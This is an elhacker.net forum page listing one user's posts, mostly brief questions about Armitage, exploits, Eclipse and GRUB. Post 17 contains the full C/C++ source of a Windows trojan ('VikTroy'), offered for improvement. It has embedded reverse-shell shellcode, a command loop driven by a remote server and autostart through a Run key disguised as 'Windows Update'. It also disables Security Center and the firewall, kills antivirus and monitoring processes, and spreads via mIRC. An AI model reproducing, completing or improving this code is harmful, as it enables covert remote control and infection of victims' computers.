elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: 1 [2] 3
11  Seguridad Informática / Bugs y Exploits / Uso del Armitage en: 1 Marzo 2014, 16:22 pm
Buenas,cuando he intentado usar el armitage para entrar en mi propio ordenador no a encontrado ningun exploit que pueda afectar a los puertos abiertos.Mi pregunta es,¿como puedo encontrar algun exploit con el que pueda aprovechar alguna vulnerabilidad de los puertos de mi ordenador y ejecutarlo con el armitage?
12  Seguridad Informática / Criptografía / Encriptacion Inversa en: 18 Febrero 2014, 21:57 pm
Alguien me puede explicar básicamente que es el método de cifrado inversa y que utilidad tienen las claves de dicha encriptacion.
13  Seguridad Informática / Hacking / Cosas relevantes del html en: 16 Febrero 2014, 22:28 pm
Buenas,llevo un tiempo estudiando html y me gustaría saber si en el código html hay algún dato relevante para obtener información acerca de las vulnerabilidades de ese sitio web.Un saludo.
14  Seguridad Informática / Hacking / Cosas relevantes del html en: 15 Febrero 2014, 12:01 pm
Buenas,llevo un tiempo estudiando html y me gustaría saber si en el código html hay algún dato relevante para obtener información acerca de las vulnerabilidades de ese sitio web.Un saludo.
15  Programación / Java / Problema Eclipse en: 13 Enero 2014, 20:12 pm
Buenas a todos,el otro día decidí instalarme el eclipse para hacer un tutorial de programar Android,el problema es que cada vez que creo un proyecto me da  error,os dejo una foto para que podáis ver el error.

16  Informática / Electrónica / Placa para circuito en: 8 Octubre 2012, 13:49 pm
Buenas gente,necesito vuestra ayuda por que tengo que hacer un proyecto de clase y necesito en papel el circuito hecho,para poder hacerlo en una placa electrónica.Muchas Gracias a todos.Un saludo. ;D (Nota el primer circuito tiene que estar duplicado ya que es para dos bobinas)



17  Seguridad Informática / Análisis y Diseño de Malware / Quiero que opinen sobre el virus en C++ y me ayuden a mejorarlo en: 13 Marzo 2012, 21:21 pm
Este es el codigo:
Código
  1.  
  2. /*
  3.    Autor: Coded by Black Ghost
  4.    Lenguaje: C/C++ Win32
  5.    Name: Black ghost
  6.    Ejecutable: Blackghost.
  7.  
  8. */
  9.  
  10. #include <windows.h>
  11. #include <stdio.h>
  12. #include <string.h>
  13. #include <winsock.h>
  14. #include <stdlib.h>
  15. #include <process.h>
  16. #include <winbase.h>
  17. //#include <sys\types.h>
  18. #include <tlhelp32.h>
  19.  
  20. #define CM_PRUEBA 101
  21. #define CM_SALIR 102
  22.  
  23. #pragma comment(lib, "wsock32.lib")
  24.  
  25.  
  26. // SOCKET PRINCIPAL
  27. SOCKET sck;
  28. char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
  29. char SeCent[] = "net stop \"Security Center\"";
  30. char Shared[] = "net stop \"SharedAccess\"";
  31. char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
  32. char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
  33. char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";
  34.  
  35. LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);
  36.  
  37. // PAYLOAD
  38. unsigned char payload[] =
  39.  
  40. "\x33\xc9\x83\xe9\xb8\xe8"
  41. "\xff\xff\xff\xff"
  42. "\xc0\x5e\x81\x76\x0e\x4a"
  43. "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
  44. "\x73\xf4\xa2\xde\x67\x46"
  45. "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
  46. "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
  47. "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
  48. "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
  49. "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
  50. "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
  51. "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
  52. "\x8b\x15\x73\x67\x69" // w0w
  53. "\x22\xec\x75\x45\x71\x77\x67"
  54. "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
  55. "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
  56. "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
  57. "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
  58. "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
  59. "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
  60. "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
  61. "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
  62. "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
  63. "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
  64. "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
  65. "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
  66. "\xa8\x54\xcb\x46\x9c"  // c0d3d
  67. "\xd8\x48\xb9\x90\x90\x90";
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74. //ListaProcesos
  75. char *proc_list[]={
  76. "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
  77. "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
  78.     "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
  79. "regedit.exe", "reg.exe" };
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89. // Thread Struct
  90.  
  91. typedef struct thread_struct
  92. {
  93. char name[250];
  94. HANDLE Thread_Handle;
  95. int id;
  96. } thread;
  97.  
  98. thread threads[10];
  99.  
  100.  
  101.  
  102.  
  103.  
  104. int Comando(char recibido[130]);
  105. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  106. void Esconder(void);
  107. void Reverse(void);
  108.  
  109.  
  110. DWORD WINAPI pcInfo(LPVOID param);
  111. DWORD WINAPI ownMirc(LPVOID param);
  112. DWORD WINAPI Pong(LPVOID param);
  113. DWORD WINAPI keyLogger(LPVOID param);
  114. DWORD WINAPI revShell(LPVOID param);
  115. DWORD WINAPI Infectar(LPVOID param);
  116. DWORD WINAPI winFuck(LPVOID param);
  117. DWORD WINAPI Happy(LPVOID param);
  118.  
  119.  
  120. int Comando(char recibido[130]);
  121. int CrearThread(char *name, HANDLE Thread_Handle, int id);
  122. void Esconder(void);
  123. void Reverse(void);
  124. /*int main(void);*/
  125. DWORD WINAPI pcInfo(LPVOID param);
  126. DWORD WINAPI ownMirc(LPVOID param);
  127. //DWORD WINAPI Pong(LPVOID param);
  128. DWORD WINAPI revShell(LPVOID param);
  129. DWORD WINAPI SendProcess(LPVOID param);
  130. DWORD WINAPI winFuck(LPVOID param);
  131. DWORD WINAPI Happy(LPVOID param);
  132. DWORD WINAPI CallChat(LPVOID param);
  133.  
  134. /*
  135. int main(int argc, char *argv[])
  136. {
  137. char bof[25];
  138. strcpy(bof, argv[1]);
  139. return 0;
  140. }
  141. */
  142.  
  143.  
  144. // INDEX
  145.  
  146. int main(void)
  147. {
  148.    HANDLE hThread;
  149. DWORD id;
  150. WSADATA wsa;
  151.    struct sockaddr_in mysock;
  152. char recvbuff[130];
  153. char *hello = "HEllO";
  154.  
  155. WSAStartup(MAKEWORD(1, 0), &wsa);
  156. sck = socket(AF_INET, SOCK_STREAM, 0);
  157. Esconder();
  158. mysock.sin_family = AF_INET;
  159. mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
  160. mysock.sin_port = htons(80);
  161. memset(&(mysock.sin_zero), '\0', 8);
  162. //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
  163. connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
  164. send(sck, hello, strlen(hello), 0);
  165. for(;;)
  166. {
  167. if(recv(sck, recvbuff, 128, 0)>2)
  168. {
  169.      Comando(recvbuff);
  170. }
  171. Sleep(800);
  172. }
  173.  
  174.    Sleep(1000);
  175. WSACleanup();
  176. system("PAUSE");
  177. return 1;
  178. }
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185. int Comando(char recibido[130])
  186. {
  187.  
  188. HANDLE hThread;
  189. DWORD id;
  190.  
  191. char *pString;
  192.  
  193. pString = strchr(recibido, '!');
  194. if(pString==NULL)
  195. {
  196. printf("error");
  197. return -1;
  198. }
  199.  
  200. pString++;
  201.  
  202. if(strncmp(pString, "info", 4)==0)
  203. {
  204. hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
  205. CrearThread("INFO", hThread, id);
  206. Sleep(1000);
  207. }
  208.  
  209. if(strncmp(pString, "mirc", 4)==0)
  210. {
  211. hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
  212. CrearThread("MIRC", hThread, id);
  213. }
  214.  
  215. if(strncmp(pString, "exit", 4)==0)
  216. {
  217. closesocket(sck);
  218. WSACleanup();
  219. system("taskkill /F /IM viktroy.exe");
  220. }
  221.  
  222. if(strncmp(pString, "shell", 4)==0)
  223. {
  224. hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
  225. CrearThread("SHELL", hThread, id);
  226. }
  227.  
  228. if(strncmp(pString, "busca", 5)==0)
  229. {
  230. hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
  231. CrearThread("SHRC", hThread, id);
  232. }
  233.  
  234. if(strncmp(pString, "winfuck", 7)==0)
  235. {
  236. hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
  237. CrearThread("FUCK", hThread, id);
  238. }
  239.  
  240. if(strncmp(pString, "showcmd", 7)==0)
  241. {
  242. HWND hWnd;
  243.    hWnd = FindWindow("ConsoleWindowClass", NULL);
  244.    ShowWindow(hWnd, SW_SHOWNORMAL);
  245. }
  246.  
  247. if(strncmp(pString, "hidecmd", 7)==0)
  248. {
  249. HWND hWnd;
  250.    hWnd = FindWindow("ConsoleWindowClass", NULL);
  251.    ShowWindow(hWnd, SW_HIDE);
  252. }
  253.  
  254. if(strncmp(pString, "happy", 5)==0)
  255. {
  256. hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
  257. CrearThread("HAPPY", hThread, id);
  258. }
  259.  
  260. if(strncmp(pString, "chat", 4)==0)
  261. {
  262. hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
  263. CrearThread("CHAT", hThread, id);
  264. }
  265.  
  266. if(strncmp(pString, "infectar", 8)==0)
  267. {
  268.      system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe");
  269.    }
  270.  
  271.  
  272. return 0;
  273.  
  274. }
  275.  
  276.  
  277.  
  278. void Reverse(void)
  279. {
  280.  void(*rever)();
  281.  *(int *)&rever = (int)payload;
  282.  rever();
  283.  
  284. }
  285.  
  286. // Not ShellCode Call
  287. /* PROCESS_INFORMATION pinfo;
  288. STARTUPINFO sinfo;
  289. SOCKET rsck;
  290. //WSADATA wsadata;
  291.     struct sockaddr_in rSock;
  292.     memset(&sinfo,0,sizeof(sinfo));
  293. //WSAStartup(MAKEWORD(1, 0), &wsadata);
  294. rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  295. rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
  296. rSock.sin_family = AF_INET;
  297.     bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
  298. rSock.sin_port = htons(666);
  299. memset(&(rSock.sin_zero), 0, 8);
  300.  
  301. connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
  302. sinfo.cb = sizeof(sinfo);
  303. sinfo.dwFlags = STARTF_USESTDHANDLES;
  304. sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
  305. CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);
  306.  
  307.   */
  308.  
  309.  
  310.  
  311. // ThreadGen
  312. int CrearThread(char *name, HANDLE Thread_Handle, int id)
  313. {
  314. int c = rand()%10;
  315. sprintf(threads[c].name,name);
  316. threads[c].id = id;
  317. threads[c].Thread_Handle = Thread_Handle;
  318. return c;
  319. }
  320.  
  321.  
  322. // HIDE
  323. void Esconder(void)
  324. {
  325. HWND hWnd;
  326. hWnd = FindWindow("ConsoleWindowClass", NULL);
  327. ShowWindow(hWnd, SW_HIDE);
  328. }
  329.  
  330.  
  331. // Arquitectura
  332. DWORD WINAPI pcInfo(LPVOID param)
  333. {
  334. SYSTEM_INFO sysinfo;
  335.    char allinfo[16];
  336. GetSystemInfo(&sysinfo);
  337. if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
  338. {
  339. strcat(allinfo, "Soy un INTEL ");
  340. if(sysinfo.wProcessorLevel==3)
  341. {
  342. strcat(allinfo, "!386 ");
  343. }
  344.  
  345. else if(sysinfo.wProcessorLevel==4)
  346. {
  347. strcat(allinfo, "!486 ");
  348. }
  349.  
  350. else if(sysinfo.wProcessorLevel==5)
  351. {
  352. strcat(allinfo, "Pentium ");
  353. }
  354.  
  355. else { strcat(allinfo, "unknow "); }
  356.  
  357. }
  358.  
  359. else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
  360. {
  361. strcat(allinfo, "Soy un PocketPC ");
  362.  
  363. if(sysinfo.wProcessorLevel==1)
  364. {
  365. strcat(allinfo, "PPC 601 ");
  366. }
  367.  
  368. else if(sysinfo.wProcessorLevel==3)
  369. {
  370. strcat(allinfo, "PPC 601 ");
  371. }
  372.  
  373. else if(sysinfo.wProcessorLevel==20)
  374. {
  375. strcat(allinfo, "PPC 620 ");
  376. }
  377.  
  378. }
  379.  
  380. SetComputerName("xZ-Ownk");
  381.    send(sck, allinfo, strlen(allinfo), 0);
  382. return 0;
  383.  
  384. }
  385.  
  386.  
  387. // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P
  388.  
  389. DWORD WINAPI ownMirc(LPVOID param)
  390. {
  391. HWND hWnd;
  392. char run1[] = "/run VikTroy.exe";
  393. SetForegroundWindow(hWnd);
  394.    hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
  395.           NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
  396.  
  397. SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
  398. SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
  399. Sleep(1500);
  400. return 0;
  401. }
  402.  
  403.  
  404. // Pong Conexion Thread
  405.  
  406. /*DWORD WINAPI Pong(LPVOID param)
  407. {
  408. char *pong="PONG";
  409. for(;;)
  410. {
  411. Sleep(25000);
  412. send(sck, pong, strlen(pong), 0);
  413. }
  414.  
  415. return 1;
  416. }
  417. */
  418.  
  419. // Reverse Shell Thread
  420.  
  421. DWORD WINAPI revShell(LPVOID param)
  422. {
  423.  
  424.  
  425.    Reverse();
  426. return 0;
  427.  
  428. }
  429.  
  430.  
  431. // Tripode
  432.  
  433. DWORD WINAPI SendProcess(LPVOID param)
  434. {
  435.  
  436. HANDLE hlista;
  437. PROCESSENTRY32 proceso;
  438. char proname[30];
  439. char killer[30];
  440. int ret, i, mok;
  441.  
  442.    mok = 0;
  443.    for(;;)
  444. {
  445.  ret = 0;
  446.  i = 0;
  447.  
  448.    for(i=0;i<17;i++)
  449. {
  450.    ZeroMemory(&proceso,sizeof(proceso));
  451. proceso.dwSize = sizeof(proceso);
  452. if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
  453. {
  454. ret = Process32First(hlista,&proceso);
  455. while(ret)
  456. {
  457.  
  458. sprintf(proname,"%i %s",proceso.th32ProcessID,proceso.szExeFile);
  459. printf("\n%s",proname);
  460.  
  461. if(strcmp(proceso.szExeFile, "mirc.exe")==0 && mok==0 )
  462. {
  463. send(sck, "\nEncontrado Mirc.exe\n", strlen("\nEncontrado Mirc.exe\n"), 0);
  464.    mok++;
  465. }
  466.  
  467. if(strcmp(proceso.szExeFile, proc_list[i])==0)
  468. {
  469. sprintf(killer, "taskkill /F /PID %d", proceso.th32ProcessID);
  470. WinExec(killer, SW_HIDE);
  471. }
  472.  
  473.  
  474. ret = Process32Next(hlista,&proceso);
  475. }
  476.  
  477.   CloseHandle(hlista);
  478. }
  479. }
  480.     Sleep(100);
  481.  
  482. }
  483.  
  484. }
  485.  
  486.  
  487.  
  488. /*HKEY hKey;
  489. unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  490.     unsigned char proceso[] = "VikTroy.exe";
  491.  
  492. RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
  493. RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
  494.     RegCloseKey(hKey);*/
  495.  
  496.  
  497.  
  498.  
  499. // WINDOWS FUCKEd x"DDDDDDDDDDD
  500.  
  501. DWORD WINAPI winFuck(LPVOID param)
  502. {
  503.  
  504.  
  505.  
  506.        __asm {
  507.     mov eax, offset SeCent
  508. push eax
  509. call system
  510. pop ebx
  511. nop
  512. nop
  513.  
  514. // Security Center Off
  515.  
  516. mov eax, offset Shared
  517. push eax
  518. call system
  519. pop ebx
  520. nop
  521. nop
  522. // Shared Off
  523.  
  524.     mov eax, offset Reg1
  525. push eax
  526. call system
  527. pop ebx
  528. nop
  529. nop
  530. // Reg1 In
  531.  
  532.  
  533. mov eax, offset Reg3
  534. push eax
  535. call system
  536. pop ebx
  537. nop
  538. nop
  539.  
  540. mov  eax, offset CreateSrv
  541. push eax
  542.                 call system
  543. pop ebx
  544. nop
  545. nop
  546.  
  547. }// Reg2 In
  548.  
  549. return 0;
  550.  
  551.  
  552. }
  553.  
  554.  
  555.  
  556. // Funcion Feliz
  557.  
  558. DWORD WINAPI Happy(LPVOID param)
  559. {
  560. int a = 0;
  561.    char *Texto = " VikTroy: Simple Trojan Horse   \n"
  562.          " http://sincontrol.tomahost.org \n"
  563.  " Gm Vk Tj Pp                    \n"
  564.  " irc-hispano.org #sub_level     \n"
  565.  " by xZR !Sub_Level Security     \n";
  566.  
  567. a = MessageBox(NULL,
  568.      Texto,
  569.  "by xZR !Sub_Level",
  570.  MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  571.   for(;;)
  572.   {
  573.    if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
  574. {
  575.           a= MessageBox(NULL,
  576.                Texto,
  577.           "by xZR !Sub_Level",
  578.                        MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
  579. }
  580.  
  581.  }
  582.  
  583.  return -1;
  584. }
  585.  
  586.  
  587.  
  588. // Not Avaible
  589.  
  590. DWORD WINAPI CallChat(LPVOID param)
  591. {
  592. HINSTANCE hInstance, hPrevInstance;
  593. LPSTR CmdLine;
  594. int uCmd;
  595. HWND hWnd;
  596. MSG uMsg;
  597. WNDCLASSEX wincl;
  598. SOCKET chatsock;
  599.    struct sockaddr_in chsock;
  600.  
  601. wincl.cbClsExtra = 0;
  602. wincl.cbWndExtra = 0;
  603. wincl.cbSize = sizeof(WNDCLASSEX);
  604. wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
  605. wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
  606. wincl.hIcon = LoadIcon(NULL, "icono.ico");
  607. wincl.hIconSm = LoadIcon(NULL, "icono.ico");
  608. wincl.hInstance = hInstance;
  609. wincl.lpfnWndProc = WindowProc;
  610. wincl.lpszClassName = "VentanaChat";
  611. wincl.lpszMenuName = NULL;
  612. wincl.style = CS_DBLCLKS;
  613.  
  614. RegisterClassEx(&wincl);
  615.  
  616. hWnd = CreateWindowEx(             0,
  617.                   "VentanaChat",
  618.  "Viktroy Talk",
  619.   WS_OVERLAPPEDWINDOW,
  620.   CW_USEDEFAULT,
  621.   CW_USEDEFAULT,
  622.   CW_USEDEFAULT,
  623.   CW_USEDEFAULT,
  624.    HWND_DESKTOP,
  625.                        NULL,
  626.   hInstance,
  627. NULL);
  628.  
  629. ShowWindow(hWnd, SW_SHOWDEFAULT);
  630.  
  631. while(TRUE == GetMessage(&uMsg, 0, 0, 0))
  632. {
  633.        TranslateMessage(&uMsg);
  634. DispatchMessage(&uMsg);
  635. }
  636.  
  637. return uMsg.wParam;
  638.  
  639.  
  640. }
  641.  
  642.  
  643. LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  644. {
  645. switch(uMsg)
  646. {
  647. case WM_DESTROY:
  648. PostQuitMessage(0);
  649. break;
  650. default:
  651. return DefWindowProc(hWnd, uMsg, wParam, lParam);
  652. }
  653.  
  654. return 0;
  655. }
  656.  


y por cierto me da error en esta Linea alguna ayudita?

-__asm {
18  Sistemas Operativos / Windows / Problema con el Grub¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ en: 22 Febrero 2012, 21:53 pm
Hola,miren yo tengo instalado el Windows 7 y el Ubuntu el otro dia se actualizo el Windows 7 y desde entonces en el Grub solo sale Windows 7 mi pregunta es DONDE ESTA UBUNTU??
19  Seguridad Informática / Hacking / No entiendo como¡¡ en: 20 Febrero 2012, 18:56 pm
El otro día había un chaval que dijo que había creado un programa con visual basic que sacaba contraseñas de tuenti, probé el programa ya que lo ha subido a Deposit Files la cuestión me lo descargue pero no iva así que le pedi al chaval del programa que me lo demostrara y me saco mi contraseña.Mi pregunta es como ha hecho ese programa con Visual Basic??
20  Seguridad Informática / Bugs y Exploits / Problema al compilar el exploit¡¡¡ en: 12 Febrero 2012, 20:01 pm
Hola miren el otro día estaba compilando el exploit SOS-10-002-pwn-isapi y cuando le di a compilar me dio el siguiente mensaje:

-exploit.c:1:20: fatal error: iostream: No such file or directory
compilation terminated.

Alguna Solución??
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines